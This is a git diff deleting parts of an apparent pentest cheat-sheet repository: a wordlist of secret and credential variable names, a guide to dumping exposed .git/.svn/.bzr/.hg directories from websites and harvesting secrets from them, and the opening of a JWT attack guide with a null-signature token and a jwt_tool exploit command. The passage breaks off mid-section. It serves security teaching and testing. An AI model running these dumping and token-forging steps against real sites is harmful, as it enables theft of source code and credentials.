-plJ2V12nLpOPwY6zTtzcoTxEN6wcvUJfHAdNovpp63hWTnbAbEZamIdxwyCqpzThDobeD354TeXFUaKvrUw00iAiIhGL2QvwapaCbhlwM6NQAmdU3tMy3nZpka6bRI1kjyTh7CXfdwXV98ZJSiPdUFxyIgFNI2dKiL3BI1pvFDfq3mnmi3WqzZHCaQqDKNEtUrzxC40swIJGLcLUiqc5xX37P47jNDWrNIRDs8IdbM0tS9pFM= -TWILIO_CONFIGURATION_SID= -TWILIO_API_SECRET= -TWILIO_API_KEY= -TWILIO_ACCOUNT_SID= -ASSISTANT_IAM_APIKEY= -encrypted_c093d7331cc3_key= -encrypted_c093d7331cc3_iv= -encrypted_913079356b93_key= -encrypted_913079356b93_iv= -encrypted_6b8b8794d330_key= -encrypted_6b8b8794d330_iv= -FIREFOX_ISSUER= -CHROME_REFRESH_TOKEN= -CHROME_EXTENSION_ID= -CHROME_CLIENT_SECRET= -CHROME_CLIENT_ID= -YANGSHUN_GH_TOKEN= -KAFKA_INSTANCE_NAME= -appClientSecret= -REPO= -AWS_SECRET_KEY= -AWS_ACCESS_KEY= -zf3iG1I1lI8pU= -encrypted_a0b72b0e6614_key= -encrypted_a0b72b0e6614_iv= -TRAVIS_API_TOKEN= -TRAVIS_ACCESS_TOKEN= -OCTEST_USERNAME= -OCTEST_SERVER_BASE_URL_2= -OCTEST_PASSWORD= -DROPBOX_OAUTH_BEARER= -id= ---token= -channelId= -encrypted_1d073d5eb2c7_key= -encrypted_1d073d5eb2c7_iv= -WPT_SSH_PRIVATE_KEY_BASE64= -WPT_DB_USER= -WPT_DB_PASSWORD= -WPT_DB_NAME= -WPT_DB_HOST= -NfZbmLlaRTClBvI= -CONTENTFUL_V2_ORGANIZATION= -CONTENTFUL_V2_ACCESS_TOKEN= -CONTENTFUL_TEST_ORG_CMA_TOKEN= --DSELION_SELENIUM_USE_GECKODRIVER= -encrypted_f09b6751bdee_key= -encrypted_f09b6751bdee_iv= -encrypted_e823ef1de5d8_key= -encrypted_e823ef1de5d8_iv= -encrypted_72ffc2cb7e1d_key= -encrypted_72ffc2cb7e1d_iv= -SQUARE_READER_SDK_REPOSITORY_PASSWORD= -GIT_NAME= -GIT_EMAIL= -org.gradle.daemon= -encrypted_42ce39b74e5e_key= -encrypted_42ce39b74e5e_iv= -cTjHuw0saao68eS5s= -HEROKU_TOKEN= -HEROKU_EMAIL= -BzwUsjfvIM= -AUTHOR_NPM_API_KEY= -AUTHOR_EMAIL_ADDR= -YT_API_KEY= -WPT_SSH_CONNECT= -CXQEvvnEow= -encrypted_ac3bb8acfb19_key= -encrypted_ac3bb8acfb19_iv= -WAKATIME_PROJECT= -WAKATIME_API_KEY= -TRAVIS_PULL_REQUEST= -TRAVIS_BRANCH= -MANIFEST_APP_URL= -MANIFEST_APP_TOKEN= -Hxm6P0NESfV0whrZHyVOaqIRrbhUsK9j4YP8IMFoI4qYp4g= -GRGIT_USER= -DIGITALOCEAN_SSH_KEY_IDS= -DIGITALOCEAN_SSH_KEY_BODY= -&project= -QIITA_TOKEN= -47WombgYst5ZcnnDFmUIYa7SYoxZAeCsCTySdyTso02POFAKYz5U= -QIITA= -DXA= -9OcroWkc= -encrypted_1daeb42065ec_key= -encrypted_1daeb42065ec_iv= -docker_repo= -WvETELcH2GqdnVPIHO1H5xnbJ8k= -STORMPATH_API_KEY_SECRET= -STORMPATH_API_KEY_ID= -SANDBOX_AWS_SECRET_ACCESS_KEY= -SANDBOX_AWS_ACCESS_KEY_ID= -MAPBOX_AWS_SECRET_ACCESS_KEY= -MAPBOX_AWS_ACCESS_KEY_ID= -MAPBOX_API_TOKEN= -CLU_SSH_PRIVATE_KEY_BASE64= -7h6bUpWbw4gN2AP9qoRb6E6ITrJPjTZEsbSWgjC00y6VrtBHKoRFCU= -encrypted_d998d81e80db_key= -encrypted_d998d81e80db_iv= -encrypted_2966fe3a76cf_key= -encrypted_2966fe3a76cf_iv= -ALICLOUD_SECRET_KEY= -ALICLOUD_ACCESS_KEY= --u= --p= -encrypted_7343a0e3b48e_key= -encrypted_7343a0e3b48e_iv= -coding_token= -TWITTER_CONSUMER_SECRET= -TWITTER_CONSUMER_KEY= -ABC= -RestoreUseCustomAfterTargets= -LOOKER_TEST_RUNNER_ENDPOINT= -LOOKER_TEST_RUNNER_CLIENT_SECRET= -LOOKER_TEST_RUNNER_CLIENT_ID= -FIREBASE_SERVICE_ACCOUNT= -FIREBASE_PROJECT_ID= -ExcludeRestorePackageImports= -RND_SEED= -OAUTH_TOKEN= -DIGITALOCEAN_ACCESS_TOKEN= -encrypted_0727dd33f742_key= -encrypted_0727dd33f742_iv= -DEPLOY_PORT= -DEPLOY_HOST= -DEPLOY_DIRECTORY= -CLOUD_API_KEY= -encrypted_18a7d42f6a87_key= -encrypted_18a7d42f6a87_iv= -RUBYGEMS_AUTH_TOKEN= -foo= -encrypted_5baf7760a3e1_key= -encrypted_5baf7760a3e1_iv= -KEYSTORE_PASS= -ALIAS_PASS= -ALIAS_NAME= -encrypted_b7bb6f667b3b_key= -encrypted_b7bb6f667b3b_iv= -encrypted_6467d76e6a97_key= -encrypted_6467d76e6a97_iv= -email= -SONA_TYPE_NEXUS_USERNAME= -PUBLISH_SECRET= -PHP_BUILT_WITH_GNUTLS= -LL_USERNAME= -LL_SHARED_KEY= -LL_PUBLISH_URL= -LL_API_SHORTNAME= -GPG_PRIVATE_KEY= -BLUEMIX_ACCOUNT= -AWS_CF_DIST_ID= -APPLE_ID_USERNAME= -APPLE_ID_PASSWORD= --Dsonar.projectKey= -&noexp= -vzG6Puz8= -encrypted_7748a1005700_key= -encrypted_7748a1005700_iv= -SIGNING_KEY_PASSWORD= -LEKTOR_DEPLOY_USERNAME= -LEKTOR_DEPLOY_PASSWORD= -CI_USER_TOKEN= -6tr8Q= -oFYEk7ehNjGZC268d7jep5p5EaJzch5ai14= -encrypted_7aa52200b8fc_key= -encrypted_7aa52200b8fc_iv= -encrypted_71c9cafbf2c8_key= -encrypted_71c9cafbf2c8_iv= -encrypted_0a51841a3dea_key= -encrypted_0a51841a3dea_iv= -WPT_TEST_DIR= -TWILIO_TOKEN= -TWILIO_SID= -TRAVIS_E2E_TOKEN= -Q= -MH_PASSWORD= -MH_APIKEY= -LINUX_SIGNING_KEY= -API_SECRET= --Dsonar.organization= --Dsonar.login= -cdscasc= -YO0= -YEi8xQ= -FIREFOX_CLIENT= -0YhXFyQ= -preferred_username= -iss= -PERCY_TOKEN= -PERCY_PROJECT= -FILE_PASSWORD= --DSELION_BROWSER_RUN_HEADLESS= -SSHPASS= -GITHUB_REPO= -ARTIFACTORY_USERNAME= -ARTIFACTORY_KEY= -query= -encrypted_05e49db982f1_key= -encrypted_05e49db982f1_iv= -PLUGIN_USERNAME= -PLUGIN_PASSWORD= -NODE_ENV= -IRC_NOTIFICATION_CHANNEL= -DATABASE_USER= -DATABASE_PORT= -DATABASE_NAME= -DATABASE_HOST= -CLOUDFLARE_ZONE_ID= -CLOUDFLARE_AUTH_KEY= -CLOUDFLARE_AUTH_EMAIL= -AWSCN_SECRET_ACCESS_KEY= -AWSCN_ACCESS_KEY_ID= -1LRQzo6ZDqs9V9RCMaGIy2t4bN3PAgMWdEJDoU1zhuy2V2AgeQGFzG4eanpYZQqAp6poV02DjegvkXC7cA5QrIcGZKdrIXLQk4TBXx2ZVigDio5gYLyrY= -zendesk-travis-github= -token_core_java= -TCfbCZ9FRMJJ8JnKgOpbUW7QfvDDnuL4YOPHGcGb6mG413PZdflFdGgfcneEyLhYI8SdlU= -CENSYS_UID= -CENSYS_SECRET= -AVbcnrfDmp7k= -test= -encrypted_5d5868ca2cc9_key= -encrypted_5d5868ca2cc9_iv= -encrypted_573c42e37d8c_key= -encrypted_573c42e37d8c_iv= -encrypted_45b137b9b756_key= -encrypted_45b137b9b756_iv= -encrypted_12ffb1b96b75_key= -encrypted_12ffb1b96b75_iv= -c6cBVFdks= -VU8GYF3BglCxGAxrMW9OFpuHCkQ= -PYPI_PASSOWRD= -NPM_USERNAME= -NPM_PASSWORD= -mMmMSl1qNxqsumNhBlmca4g= -encrypted_8b6f3baac841_key= -encrypted_8b6f3baac841_iv= -encrypted_4d8e3db26b81_key= -encrypted_4d8e3db26b81_iv= -SGcUKGqyoqKnUg= -OMISE_PUBKEY= -OMISE_KEY= -KXOlTsN3VogDop92M= -GREN_GITHUB_TOKEN= -DRIVER_NAME= -CLOUDFLARE_EMAIL= -CLOUDFLARE_CREVIERA_ZONE_ID= -CLOUDFLARE_API_KEY= -rI= -pHCbGBA8L7a4Q4zZihD3HA= -nexusUsername= -nexusPassword= -mRFSU97HNZZVSvAlRxyYP4Xxx1qXKfRXBtqnwVJqLvK6JTpIlh4WH28ko= -encrypted_fee8b359a955_key= -encrypted_fee8b359a955_iv= -encrypted_6d56d8fe847c_key= -encrypted_6d56d8fe847c_iv= -aX5xTOsQFzwacdLtlNkKJ3K64= -TEST_TEST= -TESCO_API_KEY= -RELEASE_TOKEN= -NUGET_KEY= -NON_TOKEN= -GIT_COMMITTER_NAME= -GIT_AUTHOR_NAME= -CN_SECRET_ACCESS_KEY= -CN_ACCESS_KEY_ID= -0VIRUSTOTAL_APIKEY= -0PUSHOVER_USER= -0PUSHOVER_TOKEN= -0HB_CODESIGN_KEY_PASS= -0HB_CODESIGN_GPG_PASS= -0GITHUB_TOKEN= -nexusUrl= -jxoGfiQqqgvHtv4fLzI= -gpg.passphrase= -encrypted_b1fa8a2faacf_key= -encrypted_b1fa8a2faacf_iv= -encrypted_98ed7a1d9a8c_key= -encrypted_98ed7a1d9a8c_iv= -VIP_GITHUB_DEPLOY_KEY_PASS= -TEAM_EMAIL= -SACLOUD_API= -SACLOUD_ACCESS_TOKEN_SECRET= -SACLOUD_ACCESS_TOKEN= -PANTHEON_SITE= -LEANPLUM_KEY= -LEANPLUM_APP_ID= -FIREBASE_KEY= -CONVERSATION_URL= -BLhLRKwsTLnPm8= -B2_BUCKET= -B2_APP_KEY= -B2_ACCT_ID= --Dgpg.passphrase= -YT_CLIENT_SECRET= -YT_CLIENT_ID= -WVNmZ40V1Lt0DYC2c6lzWwiJZFsQIXIRzJcubcwqKRoMelkbmKHdeIk= -TRV= -TEST_GITHUB_TOKEN= -RANDRMUSICAPIACCESSTOKEN= -NQc8MDWYiWa1UUKW1cqms= -MY_SECRET_ENV= -FDfLgJkS3bKAdAU24AS5X8lmHUJB94= -COVERALLS_SERVICE_NAME= -CONSUMERKEY= -CLU_REPO_URL= ---closure_entry_point= -gradle.publish.secret= -gradle.publish.key= -ggFqFEKCd54gCDasePLTztHeC4oL104iaQ= -encrypted_12c8071d2874_key= -encrypted_12c8071d2874_iv= -encrypted_0fba6045d9b0_key= -encrypted_0fba6045d9b0_iv= -dv3U5tLUZ0= -UAusaB5ogMoO8l2b773MzgQeSmrLbExr9BWLeqEfjC2hFgdgHLaQ= -PASS= -MONGOLAB_URI= -GITHUB_TOKENS= -FLASK_SECRET_KEY= -DB_PW= -CC_TEST_REPOTER_ID= -8FWcu69WE6wYKKyLyHB4LZHg= -zfp2yZ8aP9FHSy5ahNjqys4FtubOWLk= -rBezlxWRroeeKcM2DQqiEVLsTDSyNZV9kVAjwfLTvM= -hpmifLs= -fR457Xg1zJIz2VcTD5kgSGAPfPlrYx2xnR5yILYiaWiLqQ1rhFKQZ0rwOZ8Oiqk8nPXkSyXABr9B8PhCFJGGKJIqDI39Qe6XCXAN3GMH2zVuUDfgZCtdQ8KtM1Qg71IR4g= -encrypted_932b98f5328a_key= -encrypted_932b98f5328a_iv= -encrypted_31d215dc2481_key= -encrypted_31d215dc2481_iv= -encrypted_1db1f58ddbaf_key= -encrypted_1db1f58ddbaf_iv= -WATSON_CONVERSATION_WORKSPACE= -WATSON_CONVERSATION_USERNAME= -WATSON_CONVERSATION_PASSWORD= -SOUNDCLOUD_USERNAME= -SOUNDCLOUD_PASSWORD= -SOUNDCLOUD_CLIENT_SECRET= -SOUNDCLOUD_CLIENT_ID= -SDM4= -PARSE_JS_KEY= -PARSE_APP_ID= -NON_MULTI_WORKSPACE_SID= -NON_MULTI_WORKFLOW_SID= -NON_MULTI_DISCONNECT_SID= -NON_MULTI_CONNECT_SID= -NON_MULTI_BOB_SID= -NON_MULTI_ALICE_SID= -MULTI_WORKSPACE_SID= -MULTI_WORKFLOW_SID= -MULTI_DISCONNECT_SID= -MULTI_CONNECT_SID= -MULTI_BOB_SID= -MULTI_ALICE_SID= -GHB_TOKEN= -GCR_USERNAME= -GCR_PASSWORD= -BROWSERSTACK_USE_AUTOMATE= -AUTH_TOKEN= -0NC6O0ThWq69BcWmrtbD2ev0UDivbG8OQ1ZsSDm9UqVA= -&query= -xsixFHrha3gzEAwa1hkOw6kvzR4z9dx0XmpvORuo1h4Ag0LCxAR70ZueGyStqpaXoFmTWB1z0WWwooAd0kgDwMDSOcH60Pv4mew= -username= -ted_517c5824cb79_iv= -s3_secret_key= -s3_access_key= -n8awpV01A2rKtErnlJWVzeDK5WfLBaXUvOoc= -encrypted_f383df87f69c_key= -encrypted_f383df87f69c_iv= -encrypted_997071d05769_key= -encrypted_997071d05769_iv= -encrypted_671b00c64785_key= -encrypted_671b00c64785_iv= -encrypted_3761ed62f3dc_key= -encrypted_3761ed62f3dc_iv= -branch= -_8382f1c42598_iv= -_02ddd67d5586_key= -YANGSHUN_GH_PASSWORD= -Y8= -XJ7lElT4Jt9HnUw= -VIP_TEST= -USE_SSH= -SOMEVAR= -PROD_USERNAME= -PROD_PASSWORD= -ORG_GRADLE_PROJECT_cloudinary.url= -N= -LOGNAME= -I6SEeHdMJwAvqM6bNXQaMJwJLyZHdAYK9DQnY= -HAB_KEY= -HAB_AUTH_TOKEN= -GPG_EXECUTABLE= -GK_LOCK_DEFAULT_BRANCH= -GIT_USER= -F97qcq0kCCUAlLjAoyJg= -DB_USERNAME= -DB_PASSWORD= -DB_DATABASE= -DB_CONNECTION= -CONEKTA_APIKEY= -CLAIMR_DB= -BROWSERSTACK_BUILD= -AiYPFLTRxoiZJ9j0bdHjGOffCMvotZhtc9xv0VXVijGdHiIM= -ANALYTICS= -A= -?account= -6mSMEHIauvkenQGZlBzkLYycWctGml9tRnIpbqJwv0xdrkTslVwDQU5IEJNZiTlJ2tYl8og= -1ewh8kzxY= -0KNAME= --e= -&password= \ No newline at end of file diff --git a/Insecure Source Code Management/README.md b/Insecure Source Code Management/README.md deleted file mode 100644 index 58c0684..0000000 --- a/Insecure Source Code Management/README.md +++ /dev/null @@ -1,307 +0,0 @@ -# Insecure Source Code Management - -* [Git](#git) - + [Example](#example) - - [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead) - - [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex) - + [Tools](#tools) - - [Automatic recovery](#automatic-recovery) - * [git-dumper.py](#git-dumperpy) - * [diggit.py](#diggitpy) - * [GoGitDumper](#gogitdumper) - * [rip-git](#rip-git) - * [GitHack](#githack) - * [GitTools](#gittools) - - [Harvesting secrets](#harvesting-secrets) - * [trufflehog](#trufflehog) - * [Yar](#yar) - * [Gitrob](#gitrob) - * [Gitleaks](#gitleaks) -* [Subversion](#subversion) - + [Example (Wordpress)](#example-wordpress) - + [Tools](#tools-1) - - [svn-extractor](#svn-extractor) -* [Bazaar](#bazaar) - + [Tools](#tools-2) - - [rip-bzr.pl](#rip-bzrpl) - - [bzr_dumper](#bzr_dumper) -* [Mercurial](#mercurial) - + [Tools](#tools-3) - - [rip-hg.pl](#rip-hgpl) -* [References](#references) - -## Git - -The following examples will create either a copy of the .git or a copy of the current commit. - -Check for the following files, if they exist you can extract the .git folder. - -- .git/config -- .git/HEAD -- .git/logs/HEAD - -### Example - -#### Recovering file contents from .git/logs/HEAD - -1. Check for 403 Forbidden or directory listing to find the `/.git/` directory -2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too) - ```powershell - 0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git - 15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael 1489390329 +0000 commit: Initial. - 26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael 1489390330 +0000 commit: Whoops! Remove flag. - 6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael 1489390332 +0000 commit: Prevent directory listing. - ``` -3. Access the commit using the hash - ```powershell - # create an empty .git repository - git init test - cd test/.git - - # download the file - wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c - - # first byte for subdirectory, remaining bytes for filename - mkdir .git/object/26 - mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/ - - # display the file - git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c - tree 323240a3983045cdc0dec2e88c1358e7998f2e39 - parent 15ca375e54f056a576905b41a417b413c57df6eb - author Michael 1489390329 +0000 - committer Michael 1489390329 +0000 - Initial. - ``` -4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39 - ```powershell - wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39 - mkdir .git/object/32 - mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/ - - git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39 - 040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css - 100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt - 040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts - 100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html - 040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js - ``` -5. Read the data (flag.txt) - ```powershell - wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f - mkdir .git/object/cb - mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/ - git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f - ``` - -#### Recovering file contents from .git/index - -Use the git index file parser https://pypi.python.org/pypi/gin (python3). - -```powershell -pip3 install gin -gin ~/git-repo/.git/index -``` - -Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file. - -```powershell -$ gin .git/index | egrep -e "name|sha1" -name = AWS Amazon Bucket S3/README.md -sha1 = 862a3e58d138d6809405aa062249487bee074b98 - -name = CRLF injection/README.md -sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141 -``` - -### Tools - -#### Automatic recovery - -##### git-dumper.py - -```powershell -git clone https://github.com/arthaud/git-dumper -pip install -r requirements.txt -./git-dumper.py http://web.site/.git ~/website -``` - -##### diggit.py - -```powershell -git clone https://github.com/bl4de/security-tools/ && cd security-tools/diggit -./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True] -./diggit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1 - --u is remote path, where .git folder exists --t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init) --o is a hash of particular Git object to download -``` - -##### GoGitDumper - -```powershell -go get github.com/c-sto/gogitdumper -gogitdumper -u http://web.site/.git/ -o yourdecideddir/.git/ -git log -git checkout -``` - -##### rip-git - -```powershell -git clone https://github.com/kost/dvcs-ripper -perl rip-git.pl -v -u "http://web.site/.git/" - -git cat-file -p 07603070376d63d911f608120eb4b5489b507692 -tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2 -parent 15ca375e54f056a576905b41a417b413c57df6eb -author Michael 1489389105 +0000 -committer Michael 1489389105 +0000 - -git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2 -``` - -##### GitHack - -```powershell -git clone https://github.com/lijiejie/GitHack -GitHack.py http://web.site/.git/ -``` - -##### GitTools - -```powershell -git clone https://github.com/internetwache/GitTools -./gitdumper.sh http://target.tld/.git/ /tmp/destdir -git checkout -- . -``` - -#### Harvesting secrets - -##### trufflehog - -> Searches through git repositories for high entropy strings and secrets, digging deep into commit history. - -```powershell -pip install truffleHog # https://github.com/dxa4481/truffleHog -truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git -``` - -##### Yar - -> Searches through users/organizations git repositories for secrets either by regex, entropy or both. Inspired by the infamous truffleHog. - -```powershell -go get github.com/nielsing/yar # https://github.com/nielsing/yar -yar -o orgname --both -``` - -##### Gitrob - -> Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files. - -```powershell -go get github.com/michenriksen/gitrob # https://github.com/michenriksen/gitrob -export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef -gitrob [options] target [target2] ... [targetN] -``` - -##### Gitleaks - -> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories. - -```powershell -# Run gitleaks against a public repository -docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git - -# Run gitleaks against a local repository already cloned into /tmp/ -docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks - -# Run gitleaks against a specific Github Pull request -docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000 - -or - -go get -u github.com/zricethezav/gitleaks -``` - -## Subversion - -### Example (Wordpress) - -```powershell -curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base -``` - -1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db - ```powershell - INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL); - ``` -2. Download interesting files - * remove \$sha1\$ prefix - * add .svn-base postfix - * use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case) - * create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base` - -### Tools - -#### svn-extractor - -```powershell -git clone https://github.com/anantshri/svn-extractor.git -python svn-extractor.py –url "url with .svn available" -``` - -## Bazaar - -### Tools - -#### rip-bzr.pl - -```powershell -wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl -docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u -``` - -#### bzr_dumper - -```powershell -git clone https://github.com/SeahunOh/bzr_dumper -python3 dumper.py -u "http://127.0.0.1:5000/" -o source -Created a standalone tree (format: 2a) -[!] Target : http://127.0.0.1:5000/ -[+] Start. -[+] GET repository/pack-names -[+] GET README -[+] GET checkout/dirstate -[+] GET checkout/views -[+] GET branch/branch.conf -[+] GET branch/format -[+] GET branch/last-revision -[+] GET branch/tag -[+] GET b'154411f0f33adc3ff8cfb3d34209cbd1' -[*] Finish - -$ bzr revert - N application.py - N database.py - N static/ -``` - -## Mercurial - -### Tools - -#### rip-hg.pl - -```powershell -wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl -docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-hg.pl -v -u -``` - -## References - -- [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks) -- [bl4de, diggit](https://github.com/bl4de/security-tools/tree/master/diggit) -- [Gitrob: Now in Go - Michael Henriksen](https://michenriksen.com/blog/gitrob-now-in-go/) diff --git a/JSON Web Token/README.md b/JSON Web Token/README.md deleted file mode 100644 index c30451a..0000000 --- a/JSON Web Token/README.md +++ /dev/null @@ -1,515 +0,0 @@ -# JWT - JSON Web Token - -> JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. - -## Summary - -- [Summary](#summary) -- [Tools](#tools) -- [JWT Format](#jwt-format) - - [Header](#header) - - [Payload](#payload) -- [JWT Signature](#jwt-signature) - - [JWT Signature - Null Signature Attack (CVE-2020-28042)](#jwt-signature---null-signature-attack-cve-2020-28042) - - [JWT Signature - Disclosure of a correct signature (CVE-2019-7644)](#jwt-signature---disclosure-of-a-correct-signature-cve-2019-7644) - - [JWT Signature - None Algorithm (CVE-2015-9235)](#jwt-signature---none-algorithm-cve-2015-9235) - - [JWT Signature - Key Confusion Attack RS256 to HS256 (CVE-2016-5431)](#jwt-signature---key-confusion-attack-rs256-to-hs256-cve-2016-5431) - - [JWT Signature - Key Injection Attack (CVE-2018-0114)](#jwt-signature---key-injection-attack-cve-2018-0114) -- [JWT Secret](#jwt-secret) - - [Encode and Decode JWT with the secret](#encode-and-decode-jwt-with-the-secret) - - [Break JWT secret](#break-jwt-secret) - - [JWT tool](#jwt-tool) - - [Hashcat](#hashcat) -- [JWT Claims](#jwt-claims) - - [JWT kid Claim Misuse](#jwt-kid-claim-misuse) - - [JWKS - jku header injection](#jwks---jku-header-injection) -- [References](#references) - - -## Tools - -- [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool) -- [brendan-rius/c-jwt-cracker](https://github.com/brendan-rius/c-jwt-cracker) -- [JOSEPH - JavaScript Object Signing and Encryption Pentesting Helper](https://portswigger.net/bappstore/82d6c60490b540369d6d5d01822bdf61) -- [jwt.io - Encoder – Decoder](https://jwt.io/) - -## JWT Format - -JSON Web Token : `Base64(Header).Base64(Data).Base64(Signature)` - -Example : `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFtYXppbmcgSGF4eDByIiwiZXhwIjoiMTQ2NjI3MDcyMiIsImFkbWluIjp0cnVlfQ.UL9Pz5HbaMdZCV9cS9OcpccjrlkcmLovL2A2aiKiAOY` - -Where we can split it into 3 components separated by a dot. - -```powershell -eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 # header -eyJzdWIiOiIxMjM0[...]kbWluIjp0cnVlfQ # payload -UL9Pz5HbaMdZCV9cS9OcpccjrlkcmLovL2A2aiKiAOY # signature -``` - -### Header - -Registered header parameter names defined in [JSON Web Signature (JWS) RFC](https://www.rfc-editor.org/rfc/rfc7515). -The most basic JWT header is the following JSON. - -```json -{ - "typ": "JWT", - "alg": "HS256" -} -``` - -Other parameters are registered in the RFC. - -| Parameter | Definition | Description | -|-----------|--------------------------------------|-------------| -| alg | Algorithm | Identifies the cryptographic algorithm used to secure the JWS | -| jku | JWK Set URL | Refers to a resource for a set of JSON-encoded public keys | -| jwk | JSON Web Key | The public key used to digitally sign the JWS | -| kid | Key ID | The key used to secure the JWS | -| x5u | X.509 URL | URL for the X.509 public key certificate or certificate chain | -| x5c | X.509 Certificate Chain | X.509 public key certificate or certificate chain in PEM-encoded used to digitally sign the JWS | -| x5t | X.509 Certificate SHA-1 Thumbprint) | Base64 url-encoded SHA-1 thumbprint (digest) of the DER encoding of the X.509 certificate | -| x5t#S256 | X.509 Certificate SHA-256 Thumbprint | Base64 url-encoded SHA-256 thumbprint (digest) of the DER encoding of the X.509 certificate | -| typ | Type | Media Type. Usually `JWT` | -| cty | Content Type | This header parameter is not recommended to use | -| crit | Critical | Extensions and/or JWA are being used | - - -Default algorithm is "HS256" (HMAC SHA256 symmetric encryption). -"RS256" is used for asymmetric purposes (RSA asymmetric encryption and private key signature). - -| `alg` Param Value | Digital Signature or MAC Algorithm | Requirements | -|-------|------------------------------------------------|---------------| -| HS256 | HMAC using SHA-256 | Required | -| HS384 | HMAC using SHA-384 | Optional | -| HS512 | HMAC using SHA-512 | Optional | -| RS256 | RSASSA-PKCS1-v1_5 using SHA-256 | Recommended | -| RS384 | RSASSA-PKCS1-v1_5 using SHA-384 | Optional | -| RS512 | RSASSA-PKCS1-v1_5 using SHA-512 | Optional | -| ES256 | ECDSA using P-256 and SHA-256 | Recommended | -| ES384 | ECDSA using P-384 and SHA-384 | Optional | -| ES512 | ECDSA using P-521 and SHA-512 | Optional | -| PS256 | RSASSA-PSS using SHA-256 and MGF1 with SHA-256 | Optional | -| PS384 | RSASSA-PSS using SHA-384 and MGF1 with SHA-384 | Optional | -| PS512 | RSASSA-PSS using SHA-512 and MGF1 with SHA-512 | Optional | -| none | No digital signature or MAC performed | Required | - -Inject headers with [ticarpi/jwt_tool](#): `python3 jwt_tool.py JWT_HERE -I -hc header1 -hv testval1 -hc header2 -hv testval2` - - -### Payload - -```json -{ - "sub":"1234567890", - "name":"Amazing Haxx0r", - "exp":"1466270722", - "admin":true -} -``` - -Claims are the predefined keys and their values: -- iss: issuer of the token -- exp: the expiration timestamp (reject tokens which have expired). Note: as defined in the spec, this must be in seconds. -- iat: The time the JWT was issued. Can be used to determine the age of the JWT -- nbf: "not before" is a future time when the token will become active. -- jti: unique identifier for the JWT. Used to prevent the JWT from being re-used or replayed. -- sub: subject of the token (rarely used) -- aud: audience of the token (also rarely used) - -Inject payload claims with [ticarpi/jwt_tool](#): `python3 jwt_tool.py JWT_HERE -I -pc payload1 -pv testval3` - - -## JWT Signature - -### JWT Signature - Null Signature Attack (CVE-2020-28042) - -Send a JWT with HS256 algorithm without a signature like `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.` - -**Exploit**: -```ps1 -python3 jwt_tool.py JWT_HERE -X n -``` - 